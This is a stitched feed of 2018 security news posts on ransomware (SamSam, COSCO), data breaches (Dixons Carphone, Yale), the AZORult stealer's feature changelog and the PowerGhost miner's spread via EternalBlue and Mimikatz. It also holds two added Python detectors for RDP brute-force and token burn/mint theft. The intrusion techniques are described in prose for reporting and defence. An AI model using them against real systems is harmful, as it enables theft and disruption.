“The incident comes weeks after TSMC cheered investors with a rosy outlook for smartphone demand in the latter half of the year. That helped the market look past a reduced revenue outlook.” reported Bloomberg.

“A bellwether for the chip industry as well as an early indicator of iPhone demand, it heads into its busiest quarters grappling with waning enthusiasm for the high-powered chips used to mine digital currencies. Chief Executive Officer C. C. Wei had said TSMC’s sales will rise this year by a high single-digit percentage in U.S. dollar terms, down from an already reduced projection of about 10 percent.”

Pierluigi Paganini

(Security Affairs – Taiwan Semiconductor Manufacturing Co, Apple)

The post A malware paralyzed TSMC plants where also Apple produces its devices appeared first on Security Affairs.

Hacking tools & ready-made phishing pages being sold on dark web for $2

By Waqas

Apple Hacking Tools Double the Cost of Other Brands on Dark Web. There was a time when hackers needed to be really smart to accomplish their malicious deeds; now they only need to spend a meager amount of money to get the necessary tools and carry out attacks. Or so it seems if we have […]

This is a post from HackRead.com Read the original post: Hacking tools & ready-made phishing pages being sold on dark web for $2

Do Businesses Know When They’re Using Unethical Data?

Data breaches are costly for the businesses that experience them; the stolen data fuels black markets and is sometimes offered to companies as legitimate data.

Data breaches are extraordinarily costly for businesses that experience them, both concerning reputational damage and money spent to repair the issues associated with those fiascos. And, on the consumer side of things, the scary thing is hackers don’t just steal data for notoriety. They do it to profit, typically by selling the snatched details online.

But, then, are other businesses aware of times when the data they just bought might have been stolen instead of legally obtained?

People Can Access Most of the Relevant Black Market Sites on Standard Browsers

There was a time when venturing into the world of the online black market typically meant downloading encryption software that hid the identity of users. However, most black market transactions happen on the “open” web so that it’s possible to access the respective sites via browsers like Firefox and Chrome without downloading special software first.

That means business representatives aren’t safe from coming across stolen data if they decide only to browse the internet normally. However, the kind of information advertised on the open web should be enough to raise eyebrows by itself. It often contains credit card information or sensitive medical details — not merely names, email addresses or phone numbers.

Companies can reduce the chances of unknowingly benefiting from stolen data by not proceeding with purchases if they contain private, not readily obtainable details.

Illegitimate Sellers Avoid Giving Payment Details

Even when people seek to profit by peddling stolen data, their desire to make money typically isn’t stronger than their need to remain anonymous. Most criminals who deal with data from illegal sources don’t reveal their names even when seeking payment. They’ll often request money through means that allow keeping their identities secret, such as Bitcoin.

Less Information, More Suspicion

If companies encounter data sellers that stay very secretive about how they get their data and whether it is in compliance with data protection and sharing standards, those are red flags.

However, even when data providers do list information about how they obtain data, it’s a good idea to validate the data on your own. For example, if you get calling data from a third-party provider, you should always check it against current Do Not Call lists.

Dark Web Monitoring Services Exist

As mentioned above, stolen data frequently works its way through the open web rather than the dark web. However, it’s still advisable for companies to utilize monitoring services that search the dark web for stolen data. The market for such information is lucrative, and some clients pay as much as $150,000 annually for such screening measures. If businesses provide data that comes up as originating from the dark web, that’s a strong indicator that it came from unethical sources.

data breaches

Do Legitimate Companies Create the Demand for Stolen Data?

It’s difficult to quantify how many reputable companies might be purchasing stolen data. If they do it knowingly, such a practice breaks the law. And, even if it happens without their knowledge, that’s still a poor reflection on those responsible. It means they didn’t carefully check data sources and sellers before going through with a purchase.

Unfortunately, analysts believe it happens frequently. After data breaches occur, some of the affected companies discover their data being sold online and buy it back. When hackers realize even those who initially had the data seized will pay for it, they realize there’s a demand for their criminal actions.

After suffering data breaches, some companies even ask their own employees to find stolen data and buy it back.

Most use intermediary parties, though representatives at major companies, including PayPal, acknowledge that this process of compensating hackers for the data they took occurs regularly. They say it’s part of the various actions that happen to protect customers — or to prevent them from knowing breaches happened at all.

If companies can find and recover their stolen data quickly enough, customers might never realize hackers had their details. That’s especially likely, since affected parties often don’t hear about breaches until months after companies do, giving those entities ample time to locate data and offer hackers a price for it.

Plus, it’s important to remember that companies pay tens of thousands of dollars to recover their data after ransomware attacks, too.

Should Businesses Bear the Blame?

When companies buy data that’s new to them, they should engage in the preventative measures above to verify its sources and check that it’s not stolen. Also, although businesses justify buying compromised data back from hackers, they have to remember that by doing so, they are stimulating demand — and that makes them partially to blame.

Instead of spending money to retrieve data that hackers take, those dollars would be better spent cracking down on the vulnerabilities that allow breaches to happen so frequently.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.


Pierluigi Paganini

(Security Affairs – stolen data, data breach)

The post Do Businesses Know When They’re Using Unethical Data? appeared first on Security Affairs.

Massive ransomware attack forcing authorities to move to typewriters

By Waqas

The ransomware attack also forced employees to use hand receipts. Two municipalities in Alaska (one town and one borough to be precise) have become victims of sophisticated encryption-based malware (ransomware) attack. Reportedly, the Matanuska-Susitna (Mat Su) and the City of Valdez have both been targeted with ransomware. Moving to typewriters The attack has had a devastating impact as […]

This is a post from HackRead.com Read the original post: Massive ransomware attack forcing authorities to move to typewriters

Industrial Sector targeted in surgical spear-phishing attacks

Industrial sector hit by a surgical spear-phishing campaign aimed at installing legitimate remote administration software on victims’ machines.

Attackers carried out a spear-phishing campaign against entities in the industrial sector; messages disguised as commercial offers were used to deliver legitimate remote administration software (TeamViewer or Remote Manipulator System/Remote Utilities (RMS)) onto victims’ systems.

Attackers personalized the content of each phishing email reflecting the activity of the target organization and the type of work performed by the employee to whom the email is sent.

The campaign was discovered by experts from Kaspersky Lab who speculate the attackers are financially motivated.

“Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.” reads the blog post published by Kaspersky.

“According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts.”

Once the attackers have gained access to the victim’s system they will search for any purchase documents, as well as the financial and accounting software. Then the crooks look for various ways in which they can monetize their effort, for example, by spoofing the bank details used to make payments.

According to Kaspersky, there was a spike in the number of spear-phishing messages in November 2017, targeting up to 400 industrial companies located in Russia.


The spear-phishing campaign is still ongoing; the messages purport to be invitations to tender from large industrial companies.

The quality of the phishing messages suggests the attackers have spent a significant effort in the reconnaissance phase.

“It is worth noting that the attackers addressed an employee of the company under attack by his or her full name,” state the researchers. “This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.”

The attackers used both malicious attachments and links to external resources that are used to download the malicious code.

“Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.” state the researchers.

“For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.”

The malicious library includes the system file winspool.drv that is located in the system folder and is used to send documents to the printer.

The winspool.drv library decrypts the attackers’ configuration files, including the software settings and the password used for remotely controlling the target machine.

In the case of RMS, one of the configuration files includes the email address used by the attacker to receive the information (i.e. computer name, username and the RMS machine’s internet ID) about the infected system.

When the attackers use TeamViewer software to exfiltrate system information, a file in a malicious library contains various parameters, including the password used for remotely controlling the system and a URL of the attackers’ command-and-control server.

Unlike RMS, TeamViewer uses a built-in VPN to remotely control a computer located behind NAT.

“After launching, the malicious library checks whether an internet connection is available by executing the command “ping 1.1.1.1” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.” continues the analysis.

“Unlike RMS, Team Viewer uses a built-in VPN to remotely control a computer located behind NAT.”

The use of legitimate remote administration software allows the crooks to gain full control of compromised systems while avoiding detection.

“This choice on the part of the cybercriminals could be explained by the fact that the threat-awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies),” Kaspersky concludes.

Pierluigi Paganini

(Security Affairs – industrial sector, cybercrime)

The post Industrial Sector targeted in surgical spear-phishing attacks appeared first on Security Affairs.

Notorious hacking group Fin7’s 3 main hackers arrested by the FBI

By Waqas

Three members of a ‘prolific’ and ‘notorious’ hacking group, known for carrying out massive hacking sprees against high-profile organizations have been arrested by the Federal Bureau of Investigation (FBI). According to the US Department of Justice (DOJ), the arrested individuals were leading the global cybercrime syndicate known as Fin7. The group has stolen over 15m […]

This is a post from HackRead.com Read the original post: Notorious hacking group Fin7’s 3 main hackers arrested by the FBI

Dixons Carphone cyber breach could have affected millions more

The retailer has revealed that 10m customers have been affected by the breach. When Dixons Carphone first revealed that it had suffered a data breach last year, the retailer said that

The post Dixons Carphone cyber breach could have affected millions more appeared first on The Cyber Security Place.

3 Carbanak (FIN7) Hackers Charged With Stealing 15 Million Credit Cards

Three members of one of the world's largest cybercrime organizations that stole over a billion euros from banks across the world over the last five years have been indicted and charged with 26 felony counts, the Justice Department announced on Wednesday. The three suspects are believed to be members of the organized Russian cybercrime group known as FIN7, the hackers group behind Carbanak and

Ten years ago someone breached into a server of the Yale University

Ten years ago someone breached a server at Yale University; because the intrusion happened nearly ten years ago, there is little information about how it occurred.

After ten years, Yale University revealed a security breach that exposed an archive containing personal information of 119,000 people.

Hackers breached the famous university between April 2008 and January 2009 and apparently accessed a server hosting a single database.

“On July 26th and 27th, Yale mailed notices to members of the Yale community, including alumni/ae, faculty members, and staff members, who were affected by a data intrusion that occurred in 2008-2009.” reads the security alert published by the Yale University.


The database contained data of individuals affiliated with the university, the unauthorized access was discovered on June 16, 2018, during a security review.

The hackers accessed names, Social Security numbers, dates of birth, Yale email addresses, and in some cases the physical addresses of individuals associated with the university.

Unfortunately, there is no way to determine how the attackers compromised the server, and, according to Yale, “it is not feasible to determine the identities of the perpetrators.”

The academic institution announced that no financial information was exposed, it sent a notice letter to 97% of affected people in the Yale community.

Unfortunately, there is more disconcerting news for the Yale community: a letter sent by the University to the State of New Hampshire Attorney General revealed that the same server was hacked a second time, between March 2016 and June 2018.

This second intrusion caused the exposure of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale is offering identity monitoring services to all affected U.S. residents through the Kroll security firm. At the time there is no indication that the exposed data has been misused.

Pierluigi Paganini

(Security Affairs – Yale University, hacking)

The post Ten years ago someone breached into a server of the Yale University appeared first on Security Affairs.

How a man hacked his victims’ SIM cards to steal millions of dollars

By Waqas

Californian authorities have arrested and charged a 20-year-old college student, Joel Ortiz, for being part of a mobile phone hijacking group who hacked SIM cards. According to reports the detainee managed to hijack over 40 phone numbers and stole $5 million as well from high-profile targets including cryptocurrency investors. The Boston resident Ortiz was […]

This is a post from HackRead.com. Read the original post: How a man hacked his victims’ SIM cards to steal millions of dollars

Spam still the most common cyber crime technique, according to recent research

According to a recent study by cyber security firms F-Secure and MWR InfoSecurity, spam remains the first choice for malware implementation. Spam remains popular among cyber criminals 40 years after

The post Spam still the most common cyber crime technique, according to recent research appeared first on The Cyber Security Place.

Security Affairs: SamSam Ransomware operators earned more than US$5.9 Million since late 2015

Security experts from Sophos have published a report on the multimillion-dollar black market business run by crooks, using the SamSam ransomware as a case study.

The researchers, who tracked the Bitcoin addresses managed by the crime gang, discovered that the crooks behind the SamSam ransomware have extorted nearly $6 million from victims since December 2015, when it first appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015. 74% of the known victims are based in the United States. Other regions known to have suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid a total of $5.9 million; the security firm also estimates that the group nets around $300,000 per month.

“In total, we have now identified 157 unique addresses which have received ransom payments as well as 89 addresses which have been used on ransom notes and sample files but, to date, have not received payments,” continues the report published by Sophos.

“By analyzing the payments, and comparing this with ransom notes at the time, we can estimate the number of individual victims who have chosen to pay at least some of the ransom amount stands at 233 as of July 19th 2018. With an estimated 1 new victim being attacked each day, we believe that roughly 1 in 4 victims pay at least some of the ransom.”


SamSam ransomware payments

The attackers deploy the SamSam ransomware manually after compromising RDP on the target machine; this distinguishes SamSam infections from those of other ransomware families that rely on spam campaigns or malvertising.

The attackers brute-force RDP credentials on the target system; sometimes they use credentials obtained from other data breaches and offered for sale on the dark web.

Once a system inside the targeted organization is compromised, the SamSam operators search for other machines to infect while stealing credentials.

When the operators discover a potential target, they manually deploy SamSam using tools like PsExec and batch scripts.

The following diagram shows the different steps of the latest SamSam variant for which the initial infection vector is still unclear.

SamSam new variant

Once they have infected the largest possible number of systems in the targeted organization, the operators offer a complete clean-up of the infected systems for a special price.

The highest estimate has been US$850,000 worth of bitcoin for the decryption keys.

The encryption process prioritizes the most valuable data through a multi-tiered priority system; SamSam does not encrypt Windows system-related files.

Since its discovery, the SamSam ransomware targeted large organizations, including hospitals and educational institutions.

Sophos provides the following recommendations to secure the network of organizations against the SamSam ransomware:

  • regularly patch against known vulnerabilities for the applications and operating systems;
  • keep regular backups;
  • use multi-factor authentication;
  • restrict access to RDP (on port 3389).
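As an added example (not Sophos’s or Security Affairs’ code), the detection logic below flags the RDP brute-force pattern described above from constructed Windows Security log lines; the simplified line format, the sample addresses and the five-failures-in-five-minutes threshold are assumptions made for this illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export (not real data). Fields: timestamp, event ID,
# logon type, account, source IP. Event 4625 = failed logon, 4624 =
# successful logon; logon type 10 = RemoteInteractive, i.e. RDP.
SAMPLE_LOG = """\
2018-07-20T02:00:01 4625 10 administrator 203.0.113.7
2018-07-20T02:00:03 4625 10 administrator 203.0.113.7
2018-07-20T02:00:05 4625 10 admin 203.0.113.7
2018-07-20T02:00:07 4625 10 backup 203.0.113.7
2018-07-20T02:00:09 4625 10 sqlsvc 203.0.113.7
2018-07-20T02:00:12 4625 10 administrator 203.0.113.7
2018-07-20T02:05:30 4624 10 administrator 203.0.113.7
2018-07-20T08:15:00 4625 10 jsmith 198.51.100.20
2018-07-20T08:15:20 4624 10 jsmith 198.51.100.20
2018-07-20T09:00:00 4625 3 svc_backup 198.51.100.30
"""

LINE_RE = re.compile(r"^(\S+) (\d{4}) (\d+) (\S+) (\S+)$")


def parse_lines(text):
    """Parse the simplified export into event dicts; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, eid, ltype, user, src = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "event_id": int(eid),
                       "logon_type": int(ltype), "user": user, "src": src})
    return events


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {source_ip: details} for every source that produced at least
    `threshold` failed RDP logons inside any `window`, and note whether the
    same source later logged on successfully (a sign a guess worked)."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ev in events:
        if ev["logon_type"] != 10:      # only RDP sessions matter here
            continue
        if ev["event_id"] == 4625:
            failures[ev["src"]].append(ev)
        elif ev["event_id"] == 4624:
            successes[ev["src"]].append(ev["ts"])

    alerts = {}
    for src, fails in failures.items():
        fails.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(fails)):
            # slide the window start forward until the span fits in `window`
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                last_fail = fails[-1]["ts"]
                alerts[src] = {
                    "failures": len(fails),
                    "accounts": sorted({e["user"] for e in fails}),
                    "success_after": any(t > last_fail
                                         for t in successes.get(src, [])),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_rdp_bruteforce(parse_lines(SAMPLE_LOG)).items():
        print(ip, info)
```

The single-account login at 08:15 and the non-RDP (logon type 3) failure are deliberately left unflagged to show the threshold and logon-type filters at work.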

Pierluigi Paganini

(Security Affairs – ransomware, malware)

The post SamSam Ransomware operators earned more than US$5.9 Million since late 2015 appeared first on Security Affairs.

Security Affairs: Ransomware attack against COSCO spread beyond its US network to Americas

New revelations on the attack against COSCO confirm it was worse than initially thought, the ransomware spread beyond the US network.

Chinese shipping giant COSCO recently suffered a ransomware attack that disrupted some systems of the company in the United States.

The shipping company quickly isolated the affected systems to avoid propagation to other regions and started an internal investigation; the firm confirmed that the incident did not affect the operations of its fleet.

“After the network security problem in the Americas has been detected, to protect the interests of our customers, we have taken proactive measures to isolate internal networks to carry out technical inspections on global scale.” COSCO said in an official statement. “With the reliable confirmation from the technical experts that the networks in all other regions are secure, the network applications were recovered at 16:00 (Beijing Time) on 25th July in all the regions except the Americas. As of now, all the business operations have been back to normal in the regions with network recovered.”

New revelations on the attack confirm it was worse than initially thought, the malicious code spread beyond the US network of the company and infected systems in other countries, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.

“Chinese shipping giant COSCO said a ransomware attack has spread beyond its US network to the broader Americas, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.” reported the CBR website.

“That’s according to maritime intelligence house Lloyds List, which has reported that customers were also said to be facing issues in the UK and Turkey.” 

Due to the local network breakdown in the Americas region, local email and network telephones were not working properly at the time of the attack.

The attack on the world’s largest shipping company by dry weight tonnage has taken out emails and phones.

The company published a list of alternative Yahoo! email addresses to its customers for ordinary communications.

Security experts warned that COSCO fleet could still be at risk following the attack.

“Although COSCO has been quick to respond to this hack, the virus may have been dormant for some time, so I would not be surprised if other systems – shore- and ship-based systems – have been breached. We strongly recommend to whoever discovered the attack to thoroughly verify the breach has been contained and has not infected any ships in the COSCO fleet.” maritime cybersecurity specialists Naval Dome told IHS Fairplay.

The ransomware attack against COSCO does not appear as severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to Maersk’s second-quarter earnings report, the company expected losses between $200 million and $300 million due to “significant business interruption”, because it was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

Pierluigi Paganini

(Security Affairs – COSCO, ransomware attack)

The post Ransomware attack against COSCO spread beyond its US network to Americas appeared first on Security Affairs.

Dixons Carphone Data Breach discovered in June affected 10 Million customers

Dixons Carphone announced on Monday that the security breach discovered in June affected around 10 million customers, much more than the initial estimate.

Dixons Carphone, one of the largest European consumer electronics and telecommunication retailers, suffered a major data breach in 2017, but new data related to the incident have been shared.

The situation was worse than initially thought, the company announced on Monday that the security breach affected around 10 million customers, much more than the initial estimate.

“Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017.” reads a statement published by the company.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated.”

Dixons Carphone discovered in June 2017 an “unauthorised access” to certain data held by the company; it promptly launched an investigation and hired an external firm to shed light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

Hackers may have accessed personal information of the affected customers including their names, addresses and email addresses last year.

In June it was estimated that hackers had accessed data of 1.2 million people and that 5.9 million payment cards used at Currys PC World and Dixons Travel were exposed.

Dixons Carphone assured its customers that no financial data was exposed (pin codes, card verification values and authentication data).

“As a precaution, we are choosing to communicate to all of our customers to apologize and advise them of protective steps to minimize the risk of fraud,” continues the statement. “We are continuing to keep the relevant authorities updated.”


The company announced further security measures to protect its systems and confirmed that all necessary actions to lock out the attackers have been taken.

“We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring, and testing,” Dixons said.

This isn’t the first time the company has suffered a security breach: in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers remain potentially exposed to phishing attacks and should be vigilant.

Pierluigi Paganini

(Security Affairs – Carphone Warehouse, data breach)

The post Dixons Carphone Data Breach discovered in June affected 10 Million customers appeared first on Security Affairs.

Why trust is the biggest selling point for cybersecurity companies

Companies that lose the trust of their customers will have a hard time finding new clients. The European Union’s recent resolution to help strengthen member states’ cybersecurity measures was a clear

The post Why trust is the biggest selling point for cybersecurity companies appeared first on The Cyber Security Place.

A new sophisticated version of the AZORult Spyware appeared in the wild

A new sophisticated version of the AZORult Spyware was spotted in the wild, it was involved in a large email campaign on July 18

Malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild; it was involved in a large email campaign on July 18, just 24 hours after it appeared on cybercrime forums on the Dark Web.

Attackers sent out thousands of messages targeting North America. The messages used employment-related subjects such as “About a role” and “Job Application,” while the malicious attached documents used file names in the format of “firstname.surname_resume.doc”.

“AZORult is a robust information stealer & downloader that Proofpoint researchers originally identified in 2016 as part of a secondary infection via the Chthonic banking Trojan. We have since observed many instances of AZORult dropped via exploit kits and in fairly regular email campaigns as both a primary and secondary payload.” reads the analysis published by Proofpoint.

“Recently, AZORult authors released a substantially updated version, improving both on its stealer and downloader functionality.”


AZORult is a data stealer first spotted in 2016 by Proofpoint, which discovered it as part of a secondary infection via the Chthonic banking trojan. It was later involved in many malspam attacks, but only now have the authors released a substantially updated variant.

The latest version appears more sophisticated than previous ones, it implements the ability to steal histories from browsers (except IE and Edge), it includes a conditional loader that checks certain parameters before running the malicious code, and includes the support for Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC cryptocurrency wallets.

Below the full change log:

  • UPD v3.2
  • [+] Added stealing of history from browsers (except IE and Edge)
  • [+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
  • [+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from mysite.com, then download and run the file link[.]com/soft.exe. Also there is a rule “If there is data from cryptocurrency wallets” or “for all”
  • [+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
  • [+] Reduced the load in the admin panel.
  • [+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
  • [+] Added to the admin panel guest statistics
  • [+] Added to the admin panel a geobase

The conditional loader allows the attackers to infect only systems with specific characteristics; for example, it can check whether certain desired cookies or saved passwords from specific sites are present on the victim’s machine.

After the malware has successfully connected to the C&C server, it will send back to it the following files:

Next, after the initial exchange between the infected machine and the C&C server, the infected machine sends a report containing the stolen information. Again the report is XOR-encoded with the same 3-byte key; a portion of the decoded version is shown in Figure 5 of the Proofpoint analysis. The stolen information is organized into sections:

  • info: basic computer information such as Windows version and computer name
  • pwds: this section contains stolen passwords (not confirmed)
  • cooks: cookies or visited sites
  • file: contents of the cookies files and a file containing more system profiling information including machine ID, Windows version, computer name, screen resolution, local time, time zone, CPU model, CPU count, RAM, video card information, process listing of the infected machine, and software installed on the infected machine.

Once this phase is completed, AZORult may download the next-stage payload.

The experts attributed the campaign to the TA516 threat actor that was focused on cryptocurrencies.

“As in legitimate software development, malware authors regularly update their software to introduce competitive new features, improve usability, and otherwise differentiate their products.” said Proofpoint.

“The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes. It is noteworthy that within a day of the new update appearing on underground forums, a prolific actor used the new version in a large email campaign, leveraging its new capabilities to distribute Hermes ransomware.”

Experts noticed that the infection process requires significant user interaction in order to evade antivirus detection. Victims have to download the password-protected document and enter, in a pop-up box, the password included in the body of the email; only then does the attack proceed by asking the user to enable macros.

The macros download AZORult, which in turn downloads the Hermes 2.1 ransomware.

“AZORult malware, with its capabilities for credential and cryptocurrency theft, brings potential direct financial losses for individuals as well as the opportunity for actors to establish a beachhead in affected organizations,” concluded the experts.

Pierluigi Paganini

(Security Affairs – AZORult, hacking)

The post A new sophisticated version of the AZORult Spyware appeared in the wild appeared first on Security Affairs.

Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread

Security experts from Kaspersky Lab have spotted a new cryptocurrency miner dubbed PowerGhost that can spread leveraging a fileless infection technique.

The PowerGhost miner targets large corporate networks, infecting both workstations and servers, and employs multiple fileless techniques to evade detection.

“The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” reads the analysis published by Kaspersky.

“This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation.”

PowerGhost leverages the NSA-linked EternalBlue exploit to spread. It is an obfuscated PowerShell script containing the malware’s core code, along with several add-on modules such as the miner, the miner libraries, the Mimikatz post-exploitation tool, a module for reflective PE injection, and shellcode for the EternalBlue exploit.

The victim system is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). Experts discovered that during the infection phase a one-line PowerShell script is executed to drop the core of the miner component and run it, with the entire process taking place in the system’s memory.

The first thing the malware does is to check in with the command and control (C&C) server and, if a new version is available, download and execute it.

Then the malware uses the Mimikatz tool to obtain user account credentials from the machine and uses them to attempt lateral movement inside the target network.

“Propagation. With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.” continues the analysis.

“PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (CVE-2017-0144).”

Once it has infected a machine, PowerGhost attempts to escalate privileges using various exploits, such as the one for CVE-2018-8120.

In order to establish a foothold in the infected system, PowerGhost saves all the modules as properties of a WMI class, while the miner’s main body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

The script executes the miner by loading a PE file via reflective PE injection.

Most of the PowerGhost infections were observed in India, Brazil, Colombia, and Turkey.


Experts also discovered a PowerGhost version that implements DDoS capability, a circumstance that leads Kaspersky to believe the authors attempted to create a DDoS-for-hire service.

Further details, including Indicators of Compromise (IoCs) are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(Security Affairs – PowerGhost, cryptocurrency miner)

The post Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread appeared first on Security Affairs.

KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens

ICO platforms are becoming a privileged target for hackers; the latest victim is KickICO, a blockchain crowdfunding website for ICOs.

On Friday, KickICO disclosed a security breach: according to the platform, attackers accessed its wallets and stole over 70 million KICK tokens (roughly $7.7 million at the time).

The incident occurred on July 26, at 09:04 UTC. KickICO CEO Anti Danilevski explained that the staff learned of the security breach from victims who complained to the company.


“On July 26 at 9:04 (UTC) KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets.” reads the data breach notification published by the company.

As of Friday, the company announced that the situation was under control and the smart contract had been restored. KickICO announced it will return all stolen KICK tokens to their legitimate owners and invited them to get in touch via email at report@kickico.com.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences,” Danilevski said.

The company quickly started an investigation into the security breach; the internal staff discovered that the attackers had managed to gain access to the private key that the KickICO developers use to manage the KICK token smart contract.

Once they had obtained the key, the attackers used it to destroy KICK tokens at approximately 40 addresses and to create the same amount of tokens at 40 other wallets they controlled. With this trick the overall number of tokens did not change, so the security measures in place were not able to detect the fraudulent activity.

“The hackers gained access to the private key of the owner of the KickCoin smart contract. In order to hide the results of their activities, they employed methods used by the KickCoin smart contract in integration with the Bancor network: hackers destroyed tokens at approximately 40 addresses and created tokens at the other 40 addresses in the corresponding amount. In result, the total number of tokens in the network has not changed. ” continues the notification.

Fortunately, the community quickly discovered the security breach and helped the platform mitigate it. KICKICO responded promptly and prevented further losses by replacing the compromised private key with another one held in cold storage.
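As an added example (not KickICO’s code), the checks below show why a control that only watches the total token supply misses the destroy-and-recreate trick described above, and what a monitor that pairs burns with mints sees instead. The ledger is constructed, and the ERC-20 style convention of the zero address as the burn/mint counterparty is an assumption about the contract.

```python
from collections import defaultdict

# Constructed ledger (not real KICK data). Tuples: (block, sender, receiver,
# amount). By ERC-20 convention a transfer to the zero address is a burn and
# a transfer from it is a mint; that KickCoin emits events this way is an
# assumption for this example.
ZERO = "0x" + "0" * 40
EVENTS = [
    (100, "0xvictim01", ZERO, 1_000_000),
    (100, ZERO, "0xattacker01", 1_000_000),
    (101, "0xvictim02", ZERO, 750_000),
    (101, ZERO, "0xattacker02", 750_000),
    (150, "0xholder03", "0xholder04", 5_000),    # ordinary transfer
]


def supply_delta(events):
    """The naive control: net change in total supply (mints minus burns).
    It is zero for the paired burn/mint trick, which is why it misses it."""
    minted = sum(a for _b, s, _r, a in events if s == ZERO)
    burned = sum(a for _b, _s, r, a in events if r == ZERO)
    return minted - burned


def flag_burn_mint_pairs(events, max_block_gap=0):
    """Flag every burn matched by a mint of the identical amount within
    `max_block_gap` blocks: tokens vanishing from one holder and reappearing
    at another address while the supply stays constant."""
    burns = [(b, s, a) for b, s, r, a in events if r == ZERO]
    mints = [(b, r, a) for b, s, r, a in events if s == ZERO]
    alerts = []
    for bblock, victim, amount in burns:
        for mblock, dest, mamount in mints:
            if mamount == amount and abs(mblock - bblock) <= max_block_gap:
                alerts.append({"block": bblock, "burned_from": victim,
                               "minted_to": dest, "amount": amount})
    return alerts


def balance_changes(events):
    """Per-address net balance change, the view a supply-only check lacks:
    the victims' balances drop even though supply_delta() is zero."""
    deltas = defaultdict(int)
    for _b, s, r, a in events:
        if s != ZERO:
            deltas[s] -= a
        if r != ZERO:
            deltas[r] += a
    return dict(deltas)


if __name__ == "__main__":
    print("supply delta:", supply_delta(EVENTS))
    for alert in flag_burn_mint_pairs(EVENTS):
        print("suspicious burn/mint pair:", alert)
    print(balance_changes(EVENTS))
```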

Read more: https://cryptovest.com/news/kickico-suffered-77m-hack-attack-says-will-return-stolen-kicko-tokens/

“After the incident, the KICK token, listed on the 136th position on Coinmarketcap, has lost 1.87% in the last 24 hours. However, the move may be influenced by the bearish mood of the entire crypto market after the SEC rejected a Bitcoin ETF proposed by the Winklevoss twins.” reported the website cryptovest.com.

Pierluigi Paganini

(Security Affairs – KickICO, hacking)

The post KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens appeared first on Security Affairs.

Security Affairs: FELIXROOT Backdoor is back in a new fresh spam campaign

Security experts from FireEye have spotted a new spam campaign leveraging the FELIXROOT backdoor, a malware used in cyber espionage operations.

